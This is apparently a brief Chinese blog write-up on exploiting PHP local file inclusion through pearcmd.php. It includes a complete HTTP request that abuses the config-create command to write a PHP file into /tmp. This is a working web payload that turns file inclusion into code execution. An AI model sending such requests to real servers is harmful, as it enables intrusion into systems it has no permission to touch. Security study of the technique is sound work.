PHP裸文件本地包含

WEB
PHP
发布日期:   2022-02-22
文章字数:   254

PHP裸文件本地包含(Docker)

pearcmd.php的利用

php中的register_argc_argv当开启了这个选项用户的输入将会被赋予给$argc,$argv,$_SERVER['argv']几个变量

image-20220115103253782

pearcmd.php

pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装。利用pearcmd.php这个pecl/pear中的文件。

抓取并修改数据包:

GET /include.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: chenluo77.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

image-20220115113158185

  • 之后成功写入,查看/tmp目录

image-20220115113240260

参考链接

文章作者: 尘落
文章链接: http://39.105.134.199/2022/02/22/424.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 尘落 !
WEB
评论
  目录